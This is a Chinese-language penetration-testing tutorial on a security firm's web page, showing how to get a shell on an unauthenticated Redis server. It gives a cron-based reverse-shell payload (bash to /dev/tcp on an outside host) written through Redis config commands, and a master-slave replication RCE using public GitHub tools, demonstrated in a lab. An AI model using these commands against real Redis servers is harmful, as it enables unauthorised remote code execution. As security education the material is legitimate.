网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

网络安全工具团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 工具 > 网络安全工具 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

渗透测试经验分享:Redis+Getshell

文章来源:重庆网络安全 发布时间:2020-01-13 09:52:15 围观次数:
分享到:

摘要:redis是一个Key-Value类型数据库。 所有redis数据都在内存中操作,并且可以将内存中的数据定期存储到磁盘,并支持保存多个数据结构(String、hash、list)。

   简单来说,redis是一个Key-Value类型数据库。 所有redis数据都在内存中操作,并且可以将内存中的数据定期存储到磁盘,并支持保存多个数据结构(String、hash、list)。


  1.未经授权的访问漏洞


  默认情况下,Redis绑定到0.0.0.0:6379。 如果没有受限的IP访问,则Redis服务将在公共网络上公开,并且如果未设置密码身份验证,它将导致任何用户的未经授权的访问。  Redis和读取Redis数据并写入用于远程连接的公共密钥。


  获得数据库权限,但我们的目标只有一个,getshell!


  当前,有两种主流方法,一种是定时计划反弹shell,第二种是使用主从复制rce。


  2.安排反弹shell

  1)set x “\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n”

  2)config set dir /var/spool/cron/

  3)config set dbfilename root

  4)save

  3.使用主从复制RCE


  该漏洞存在于4.x和5.x版本中。  Redis提供了主从模式。 主从模式是指将一个Redis用作主机,将另一个Redis用作备份机。 主站和从站的数据相同。 主机仅负责写。 在Reids 4.x之后,通过外部扩展,可以在redis中实现新的Redis命令以构造恶意的.so文件。 当两个Redis实例设置为主从模式时,Redis主实例可以通过FULLRESYNC将文件同步到从属。 然后将恶意的so文件加载到从服务器上并执行命令。


  需要使用工具,在GitHub上下载。


  1)git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(需要make)


  2)git clone https://github.com/Ridter/redis-rce.git

  然后通过未经授权的访问或弱密码连接到Redis,并执行脚本以获取Shell。

blob.png

实际练习:


  这次扫到6379,即Redis。 有时可以更改默认端口。 建议进行全端口扫描。 这次,使用主从复制rce获取外壳。


  攻击IP:192.168.109.134


  服务器IP:192.168.109.136

blob.png

通过未经授权的访问连接到Redis(如果您有密码,则可以尝试使用blasting和authpassword登录到系统):Redis-cli –h ip

blob.png

使用主从rce获取外壳


  首先,您需要生成一个恶意的.so文件,下载RedisModules-ExecuteCommand并使用make对其进行编译。

blob.png

攻击方执行:


  python redis-rce.py -r目标ip-p目标端口-L本地ip -f恶意.so


  成功获得shell

blob.png


本文由 重庆网络安全 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:渗透测试 经验分享 Redis Getshell

上一篇:NoXss:Web安全工程师用于批量检测xss的脚本工具
下一篇:渗透测试技术之Powershell命令操作及使用方法大全

热门资讯

鼠标向下滚动